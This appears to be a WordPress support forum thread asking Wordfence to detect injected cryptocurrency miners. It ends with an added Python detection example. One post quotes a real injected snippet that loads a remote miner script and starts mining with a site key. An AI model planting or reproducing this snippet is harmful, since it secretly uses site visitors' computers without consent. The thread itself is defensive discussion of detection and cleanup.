It would be superb if you guys could add an option to scan for cryptocurrency miners. There have been quite a few WP attacks lately that are inserting these miners into WP sites.
Some people may legitimately want a miner on their site so I guess this could be a warning?
Wordfence scans already include checks for cryptocurrency-miners signatures.
However, note that you can “add extra signatures” on the Wordfence -> Options page (we only treat those extra patterns as RegEx).
Please accept my apologies. I provided incorrect information.
I was discussing this topic with my colleagues and I misunderstood their reaction.
Wordfence scans do not include checks for cryptocurrency-miners signatures at the moment as we don’t have evidence yet that they frequently occur on WordPress sites. If you have any malware samples proving otherwise, please send them in.
However, you can still add extra signatures on the Wordfence -> Options page.
- This reply was modified 5 months, 3 weeks ago by wfyann. Reason: Extra information
Thanks for the update @wfyann
Is there any documentation for what signature format to use and where to find them?
You want evidence of CRYPTO Miners: here you go. One of numerous results on GravityScan.
Medium Information Cryptominer Script Found (on /)
Cryptominers use client browsers to mine for cryptocurrency and can have negative effects for users on the website. If you meant to add this script please overlook this result. If you did not intentionally include this script your website may have been hacked.
Apologies for the delayed update.
Please have a look at this post on our blog regarding Wordfence upcoming features to detect cryptominer scripts.
Superb! Thanks for the update @wyfann
Kaspersky is detecting this code from some of our sites:
<div style="bottom:0; visibility:visible !important; display: block !important;"><center><!-- nsr-ID 30806962 1515082736 --> <script src="https://www.hashing.win/scripts/zoogmoeder.js"></script><script>var miner = new Client.Anonymous("6cbf25e53638b9537f4da07d24f73cf1cf50b28962aab453bba3fd9d1df99dd0", { throttle: 0.2 });miner.start();</script><style>#credits
Please let me know how to eliminate it. I am suspecting it comes from SiteOrigin plugin and WordFence does not detect it.
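A content check of the kind this thread asks for, shown as an added example that is not part of the original posts and is not Wordfence's or GravityScan's detection logic. The patterns are assumptions derived from the shape of the snippet quoted above; the function name `scan`, the verdict labels, and the sample hosts and key are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Heuristics derived from the snippet quoted in this thread (assumptions,
# not any vendor's signatures).
CTOR = re.compile(r"new\s+[\w$]+\.Anonymous\s*\(\s*[\"'][0-9a-f]{64}[\"']", re.I)
THROTTLE = re.compile(r"\bthrottle\s*:\s*\d*\.?\d+")
START = re.compile(r"\b[\w$]+\.start\s*\(\s*\)")
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']([^\"']+)[\"']", re.I)
SMART_QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"',
                              "\u2018": "'", "\u2019": "'"})

# Constructed samples: placeholder hosts and a made-up 64-hex key.
SAMPLE_INFECTED = (
    '<div><script src="https://miner.example/lib.js"></script>\n'
    '<script>var miner = new Client.Anonymous("' + "ab" * 32 + '",\n'
    '  { throttle: 0.2 });\nminer.start();</script></div>'
)
SAMPLE_CLEAN = ('<script src="https://cdn.example/player.js"></script>'
                '<script>player.start();</script>')


def scan(html, allowed_hosts=()):
    """Return a verdict and the evidence behind it for one page of HTML."""
    text = html.translate(SMART_QUOTES)  # CMS and forum pastes often curl quotes
    hits = []
    if CTOR.search(text):
        hits.append("constructor")
        # throttle/start are too generic alone; count them only as corroboration.
        hits += [name for name, rx in (("throttle", THROTTLE), ("start", START))
                 if rx.search(text)]
    # External script hosts that are not on the site owner's allowlist.
    hosts = {urlparse(src).hostname for src in SCRIPT_SRC.findall(text)}
    unknown = sorted(hosts - {None} - set(allowed_hosts))
    # "warn" rather than "remove": the owner may have added the miner on purpose.
    verdict = "warn" if len(hits) >= 2 else "review" if hits else "clean"
    return {"verdict": verdict, "hits": hits, "unknown_hosts": unknown}


if __name__ == "__main__":
    print(scan(SAMPLE_INFECTED, allowed_hosts={"cdn.example"}))
    print(scan(SAMPLE_CLEAN, allowed_hosts={"cdn.example"}))
```

The result is a warning with evidence rather than an automatic removal, since a site owner may have installed a miner deliberately.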